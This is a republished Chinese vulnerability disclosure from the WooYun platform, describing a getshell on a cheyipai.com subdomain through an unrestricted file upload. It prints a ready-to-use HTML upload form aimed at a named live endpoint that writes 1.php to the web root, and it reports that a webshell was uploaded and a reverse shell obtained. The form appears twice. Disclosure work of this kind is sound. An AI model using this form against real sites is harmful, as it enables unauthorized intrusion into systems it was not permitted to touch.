首页 > web前端 > html教程 > 车易拍某站Getshell_html/css_WEB-ITnose

车易拍某站Getshell_html/css_WEB-ITnose

WBOY
发布: 2016-06-21 08:51:57
原创
1265 人浏览过

漏洞标题 车易拍某站Getshell
相关厂商 cheyipai.com
漏洞作者 荒废的腰子
提交时间 2016-03-28 11:03
公开时间 2016-04-02 11:10
漏洞类型 文件上传导致任意代码执行
危害等级
自评Rank 15
漏洞状态 漏洞已经通知厂商但是厂商忽略漏洞
Tags标签 getshell, 任意文件上传

漏洞详情

存在可以上传文件的地方

http://imo.cheyipai.com/file/NDisk/write.php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>
登录后复制
登录后复制

上传一句话木马

成功反弹shell

漏洞证明:

存在可以上传文件的地方

http://imo.cheyipai.com/file/NDisk/write.php

<!DOCTYPE html><html>		<body>		<form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> 	<input name="name" type="file" />	<input name="filename" type="hidden" value="1.php"/>	<input name="cid" type="hidden"value="/"/>	<input type="submit" name="Submit" value="Go"/></form>	</body></html>
登录后复制
登录后复制

上传一句话木马

成功反弹shell

修复方案:

升级

版权声明:转载请注明来源 荒废的腰子@ 乌云

【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】

相关标签:
来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板